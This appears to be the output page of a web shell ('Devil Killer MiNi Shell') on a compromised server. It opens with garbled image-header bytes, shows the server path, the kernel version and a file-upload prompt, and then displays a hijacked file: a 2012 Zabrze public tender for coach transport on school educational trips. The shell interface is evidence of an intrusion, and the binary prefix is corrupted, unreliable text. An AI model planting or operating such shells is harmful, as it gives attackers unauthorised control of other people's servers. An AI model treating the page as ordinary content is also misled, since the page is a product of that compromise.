JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/46649-N-2012.html

<p class="kh_header"><b>Zabrze: Transport dla uczestników projektu Poznaję, badam, wiem związany z organizacją wycieczek edukacyjnych</b><br>
<b>Numer ogłoszenia: 46649 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zabrze , ul. Powstańców Śląskich 5-7, 41-800 Zabrze, woj. śląskie, tel. 32 3733537, 2710011, faks 32 3733427, 2710818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transport dla uczestników projektu Poznaję, badam, wiem związany z organizacją wycieczek edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi transportowej dla uczestników projektu pn. Poznaję, badam, wiem, współfinansowanego ze środków Europejskiego Funduszu Społecznego nr UDA-POKL.09.01.02-24-118/10-00, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych związany z organizacją wycieczek edukacyjnych dla maksymalnie 1914 uczestników projektu -  jednodniowej krajowej w roku szkolnym 2011/2012 oraz jednodniowej krajowej w roku szkolnym 2012/2013 z zachowaniem ogólnie przyjętych zasad i wymagań związanych z przewozem dzieci. Przewóz dzieci odbywać się może wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym ( Dz.U. z 2005 r., Nr 108, poz.908 z późn. zmianami ) i innych przepisach związanych z przewozem osób, ustawą z dnia 6 września 2001 r. o transporcie drogowym ( Dz.U. z 2007 r., Nr 125, poz.874 z późn.zm. ). Zgodnie z art. 93 ust. 1a ustawy Prawo zamówień publicznych Zamawiający przewiduje unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej, które miały być przeznaczone na sfinansowanie całości lub części zamówienia.
Zamówienie zostało podzielone na 2 części.
Usługi objęte zamówieniem muszą być świadczone środkami transportu o standardach autokaru wycieczkowego prowadzonymi przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.
Szczegółowy opis przedmiotu zamówienia zawiera Część IV SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości dla poszczególnych części następująco: 
Część 1: 1 400,00 zł (słownie: jeden tysiąc czterysta złotych)
Część 2:   800,00 zł (słownie : osiemset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez  Wykonawcę warunków w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania Wykonawca przedstawi dokumenty:
A) dokument potwierdzający wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych zgodnie z właściwymi postanowieniami ustawy z dnia 29 sierpnia 1997r. o usługach turystycznych ( Dz. U. z 2004r. Nr 223 poz. 2268 ze zm.); 
B) aktualną licencję na wykonywanie krajowego lub międzynarodowego transportu drogowego osób.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku w zakresie posiadania wiedzy i doświadczenia Wykonawca przedstawi wykaz nie mniej niż 5 wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, polegających na świadczeniu usług transportowych w ramach organizacji wycieczek edukacyjnych dla młodzieży w wieku szkolnym, w tym minimum 5 wycieczki 1 dniowych krajowych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia tj. z podaniem ich wartości, przedmiotu,  dat wykonania i odbiorców oraz dokumenty, potwierdzające, że usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie o wartości łącznej co najmniej:
Część 1: 35 000,00 zł brutto
Część 2: 15 000, 00 zł brutto
Warunek dotyczący  doświadczenia  wykonawcy  nie podlega sumowaniu dla części  od numeru 1 do numeru 2, tzn. spełnienie warunku wyższego  jest równoznaczne ze spełnieniem warunku niższego - wymagania ilościowe i jakościowe można traktować łącznie dla każdej Części. 
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku w zakresie dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, Wykonawca przedstawi wykaz środków transportu dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami   obejmujący:
- autokar (liczba sztuk w zależności od części zamówienia) przystosowany do przewozu osób posiadających min:
a) co najmniej 50 miejsc siedzących ( z kierowcą )   - dla części 1 zamówienia
co najmniej 33 miejsc siedzących ( z kierowcą ) - dla części 2 zamówienia
b) fotele turystyczne, wyposażone w podłokietniki od strony przejścia, pokrycie zagłówków, podnóżki, kubły na śmieci, pasy bezpieczeństwa na wszystkich siedzeniach - biodrowe lub dwupunktowe,
c) boczne drzwi wejściowe w przedziale pasażerskim otwierane przez kierowcę pneumatycznie lub elektrycznie, zabezpieczone prze otwarciem w czasie jazdy,
d) półki bagażowe nad miejscami siedzącymi,
e) sprawny system ogrzewania wnętrza autobusu w okresie jesienno-zimowym, klimatyzację w okresie letnim z indywidualnymi nawiewami,
f) oświetlenie wewnętrzne, dwustopniowe jasne/ciemne, diodowe oświetlenie nocne,
h) nagłośnienie autokaru, w tym mikrofon dla kierowcy i pilota,
i) każdy pojazd przewożący dzieci musi być oznakowany z przodu i z tyłu kwadratowymi tablicami barwy żółtej z symbolem dzieci barwy czarne, w warunkach niedostatecznej widoczności tablice powinny być oświetlone, chyba, że są wykonane z materiału odblaskowego. 
Ilość autokarów jaką zapewnia Wykonawca musi być spójna z podziałem zamówienia na części i z harmonogramem planowanych wycieczek.
Usługi objęte zamówieniem muszą być świadczone środkami transportu o standardach autokaru wycieczkowego prowadzonymi przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacja o podstawie do dysponowania tymi osobami; Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności:
1. Kierowca autokaru - posiadający uprawnienia do kierowania pojazdem przewidzianym do realizacji zamówienia (autokar) - prawo jazdy kat. D, kwalifikacje do przewozu dzieci.
 - zakres wykonywanych czynności: kierowanie pojazdem przewidzianym do realizacji zamówienia ( autokar ).
 -doświadczenie: min. 3 letnie doświadczenie w zakresie prowadzenia autokarów na trasach  krajowych i międzynarodowych, spełniającymi wymagania określone w przepisach ustawy z 26.06.1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2005 r Nr 108 poz.908).
W przypadku przejazdów trwających powyżej 9 godzin Wykonawca zobowiązany jest zapewnić dwóch kierowców na jeden środek transportu ( autokar ).  Liczba osób ( kierowców ), które będą uczestniczyć w realizacji zamówienia, musi być spójna z podziałem zamówienia na części i z harmonogramem planowanych wycieczek.
Wykonawca zobowiąże kierującego pojazdem do posiadania w trakcie każdego wyjazdu i okazywania na żądanie wymaganego prawa jazdy kat. D, dowodu rejestracyjnego pojazdu, dokumentu stwierdzającego zawarcie umowy obowiązkowego ubezpieczenia OC, NNW oraz pozostałych dokumentów wynikających z ustawy o transporcie. 
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca przedstawi opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 25.000,00 zł.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające, że łącznie spełniają warunki udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokumenty, o których mowa wyżej są składane w oryginale lub kopii i poświadczane za zgodność z oryginałem przez inne podmioty udostępniające wykonawcy odpowiednio potencjał techniczny, osoby zdolne do wykonania zamówienia, wiedzę i doświadczenie oraz zdolności finansowe zgodnie z zapisami paragrafu 6 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość zmian postanowień w zawartej umowie takich jak:
- zmiana ceny oferty wynikająca z faktycznej ilości uczestników wycieczki, w takim przypadku, cena oferty stanowić będzie iloczyn faktycznej ilości uczestników wycieczki i ceny brutto na jednego uczestnika określonej w ofercie Wykonawcy;
- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy,
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy,
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych,
- zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabrze.magistrat.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zabrzu, Wydział Oświaty, Centrum Kształcenia Praktycznego i Ustawicznego w Zabrzu, Biuro Projektu, ul. 3 Maja 95, 41-800 Zabrze, pok.3A osoba przekazująca: Magdalena Wilczak.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2012 godzina 09:00, miejsce: Urząd Miejski w Zabrzu, Biuro Zamówień Publicznych, ul. Wolności 286, 41-800 Zabrze, pok 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca zrealizuje przedmiot zamówienia w nieprzekraczalnym terminie:
a) w przypadku części 1 w roku szkolnym 2011/2012 od podpisania umowy do 29 czerwca 2012; 
b) w przypadku części 2 w roku szkolnym 2012/2013 od podpisania umowy do 28 czerwca 2013,
zgodnie z harmonogramem planowanych wycieczek. Harmonogram planowanych wycieczek, z jakimi związane będzie świadczenie usługi transportowej, zostanie przedstawiony Wykonawcy po ostatecznym jego ustaleniu przez Zamawiającego. 
W razie awarii autokaru Wykonawca zapewnia usunięcie usterki w czasie do 4 h od momentu jej stwierdzenia bądź dostarczenie w tym czasie autokaru zastępczego spełniającego wymogi określone w SIWZ i umowie, w taki sposób, aby nie powodować opóźnień czasowych. Zamawiający nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów.
W przypadku, gdy Wykonawca nie zapewni zastępczego środka transportu oraz kierowców w sytuacji określonej powyżej Zamawiający zleci wykonanie zastępczej usługi osobie trzeciej na koszt Wykonawcy, naliczając karę umowną.
Zamawiający określa, że część zamówienia, polegająca na wykonaniu usługi transportu uczestników wycieczki może być powierzona podwykonawcom.
Projekt pn.: Poznaję, badam, wiem nr: WND-POKL.09.01.02-24-118/10, współfinansowany ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> usługa transportowa związana z organizacją jednodniowej krajowej wycieczki edukacyjnej w roku szkolnym 2011/2012 na trasie Zabrze Plac Warszawski - Centrum Nauki Kopernik Warszawa ul. Wybrzeże Kościuszkowskie 20 - Zabrze Plac Warszawski - dla 33 grup 30 osobowych ( maksymalnie 962 uczestników projektu + 65 opiekunów z ramienia szkoły).Zamówienie obejmuję 21 wyjazdów autokarów co najmniej 50 osobowych z kierowcą wg harmonogramów dostarczonych przez Zamawiającego. Zamawiający zastrzega sobie możliwość łączenia grup. W jednym dniu wycieczki wyjazd 2 autokarów z 90 uczestnikami projektu + 6 opiekunów ( tj. w 1 autokarze 45 uczestników projektu + 3 opiekunów + 1 kierowca) . Wyjazdy we wtorki   i środy. Planowany wyjazd z Zabrza ok. 4:00. Zwiedzanie wystaw stałych CNK i udział w zajęciach laboratoryjnych odbywać się będzie w godzinach od 9:00 do ok. 14:30. Wyjazd powrotny do Zabrza ok. 15:00. Przyjazd do Zabrza ok. 20:30. Szacunkowa długość trasy 1 autokaru w obie strony : 653,8 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część 2.</p>
